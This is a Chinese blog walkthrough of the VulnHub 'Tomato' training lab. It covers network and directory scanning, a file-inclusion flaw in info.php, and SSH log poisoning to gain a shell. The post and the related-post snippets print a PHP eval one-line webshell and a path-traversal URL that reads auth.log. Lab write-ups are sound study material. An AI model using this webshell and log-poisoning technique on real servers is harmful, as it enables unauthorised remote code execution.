tomato靶场通关详细攻略

最新推荐文章于 2025-08-05 19:41:49 发布
最新推荐文章于 2025-08-05 19:41:49 发布
阅读量176 收藏
点赞数 3
CC 4.0 BY-SA版权
文章标签: linux 运维 服务器 tomato 靶场 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_77611368/article/details/146212483

确保kali和虚拟机的网络适配器都为NAT

扫描网段

先确定kali的ip为192.168.159.146,

扫描同网段

nmap 192.168.159.146/24

发现还有一个149的ip,虚拟机的ip即为192.168.159.149

访问网站

在物理机访问虚拟机ip

扫描端口

寻找子域

在kali中使用dirb工具

dirb http://192.168.159.149

5.访问网站

访问扫出来的网站

依次点开查看内容

看到敏感信息info.php,点开查看

右键查看一下源代码

发现有个注释掉的get型漏洞

使用image参数发送指令,有回应,存在漏洞

尝试连接写入病毒

<?php eval($_POST[cmd]);?>

尝试登录后我们的木马会来到日志中,链接即可

vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1695
小白学渗透
VulnHub渗透测试实战靶场 - Tomato
m0_74215510的博客
04-27 1616
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
tomato靶场通关攻略
2401_85578339的博客
03-12 526
http://192.168.126.151/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.loghttp://192.168.126.151:2211/<?php @eval($_POST['cmd']);?>运用蚁剑连接木马,连接成功即可
Tomato靶场通关攻略
2301_80176211的博客
09-04 199
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。的信息,允许远程读取URL文件,但是不允许包含URL文件,可以进行利用。查看源码发现 ,提示可以传参,存在文件包含漏洞。查看日志文件,日志文件记录了其他用户的一些操作,其中或许留有线索。详细扫描一下端口,发现2211端口是开放的。尝试过后,我们发现是113,利用kali。,接着访问该目录,发现存在很多文件。我们发现了一个地址,去访问一下。
tomato靶场通关流程
2302_77969979的博客
07-21 138
10.我们可以看到文件内容被读取了出来,接下来我们就可以尝试着使用文件包含的漏洞来获取webshell,我们来尝试读取一下日志文件。7.我们一个一个试一下,我们在点击info.php时,发现这是一个php的配置文件,我们仔细看一下,发现了这俩个参数。11.我们仔细看一下其中内容,发现日志中存在着ssh的日志,既然如此,我们就尝试着利用这一点来上传一个一句话木马。1.我们先打开靶场,却发现为桥接模式,桥接模式的机器太多,难以确定,所以我们将桥接模式改为nat模式。5.接下来我们访问一下扫出来的目录。
tomato靶场通关
m0_73771249的博客
09-04 223
6、查看etc/passwd ,查看日志。8、使用蚁剑进行连接查看,可以使用终端。4、发现一个info.php文件查看。1、使用nmap扫描C段查找网址。5、查看源代码,发现文件包含漏洞。2、使用dirb扫描目录。3、打开网站查看目录。
Tomato靶场通关教程
fristchoice的博客
07-21 887
本文记录了对192.168.80.131靶机的渗透测试过程。首先通过网段扫描发现目标IP,发现8888端口存在登录界面但无法突破。通过目录扫描发现/antibot_image/info.php存在文件包含漏洞,可读取/etc/passwd。尝试利用日志文件GetShell未果后,转用SSH暴力破解,最终成功通过auth.log文件写入木马并获取系统权限。整个过程展示了从信息收集到漏洞利用的完整渗透路径。
Tomato靶机通关攻略
weixin_74124665的博客
07-21 215
我们可以在url上试一下查看etc/passwad目录下的东西,这里我用../一直回溯目录找到的../是返回上一级目录的意思。然后我们用Nmap工具扫一下c段,注意扫c段的时候开只开靶机一台虚拟机,要不容易扫到别的。vm左上角点编辑,虚拟网络编辑器,看一下子网ip,我的是192.168.109.0。可以看到我们扫出来3个敏感目录,我们挨个访问一下,发现只有下面那个目录下有东西。他这提醒了我们,这个页面是用image这个参数传参的,且是get传参。这里我们就想到,文件包含日志,来放进我们的木马。
靶场通关 | Tomato靶机通关秘籍~
鱼溯的博客
10-20 1587
靶场通关 | Tomato靶机通关秘籍~
VulnHub-Tomato靶机通关攻略
m0_66808441的博客
03-12 411
虽然访问到了但页面没有返回结果,可能没有权限。
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
Tomato QoS设置详细教程
09-30
Tomato QoS 设置详细教程 Tomato QoS 设置是 Tomato 路由器中的一种流量控制机制,通过设置不同的优先级和带宽限制,来控制网络流量,提高网络性能和稳定性。本文将详细介绍 Tomato QoS 设置的各个选项和参数,帮助...
tomato打印服务共享教程
06-01
tomato打印服务共享教程 本教程旨在指导用户如何配置tomato打印服务共享,实现打印机的网络共享。整个过程可以分为五个...本教程提供了详细的配置步骤,指导用户如何配置tomato打印服务共享,实现打印机的网络共享。
linux-系统日志查看指令systemctl
guchuanhang的专栏
08-05 425
本文介绍了Linux系统管理中的三个重要工具:systemctl用于管理系统服务,包括启动/停止服务和设置开机自启;journalctl用于查看systemd日志,支持按服务筛选和实时跟踪;以及基本日志查看和端口占用检查方法。文中还讲解了.service文件的存放位置差异,提供了常用命令参考和实用技巧,如查看Nginx进程启动时间、日志关键字搜索等。这些工具和技巧能有效帮助管理员进行日常系统维护和故障排查。
Linux-进程优先级
m0_73936730的博客
08-04 715
简单的说优先级和权限的区别: 老规矩:先写个简单的进程代码: 进程优先级的修正数据,nice 值,nice其取值范围是-20至19,一共40个级别。新的优先级 = 优先级(默认80) + nice,这样,当nice值为负值的时候,那么该程序将会优先级值将变小,即其优先级会变高,则其越快被执行,所以调整进程优先级,在Linux下,就是调整进程nice值。再次修改nice值会失败,进程优先级不能经常修改我们 语法格式: 示例: 语法格式: 示例:
linux2.6 和 unix-v6 源码实验
is0815的博客
08-03 1043
你可以通过实现 Linux 2.6.x 的源码级图形调试,能看到源码、变量、寄存器,非常适合研究内核启动过程。同理,可以编译 unix-v6 (https://github.com/mit-pdos/xv6-public.git)以下是使用xv6‑public(xv6 的 x86 版本)在 Ubuntu/Linux 上安装、编译、运行、调试的详细中文指南。如果你想使用 RISC‑V 版本(xv6‑riscv),后续内容里也有说明。面向 Intel x86 架构,使用 ELF 格式。
14.Linux : nfs与autofs的使用
最新发布
xie52的博客
08-05 432
【代码】14.Linux : nfs与autofs的使用。
Linux 设备驱动程序(3)- 字符驱动(1)
qq_49477505的博客
08-02 1375
本文介绍了Linux字符设备驱动的开发流程,重点讲解了设备编号管理、核心数据结构及注册方法。字符设备驱动用于管理以字节流方式读写的设备,如串口、键盘等。开发时需处理主次设备号分配、file_operations结构定义、file/inode结构使用等关键环节。文章详细说明了静态/动态分配设备号的方法,以及通过cdev结构注册驱动的步骤(初始化、添加、创建节点等)。最后强调驱动卸载时要反向释放资源,包括删除设备文件、注销cdev结构等。整个流程体现了字符设备驱动如何在内核中建立设备编号与操作方法的关联机制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值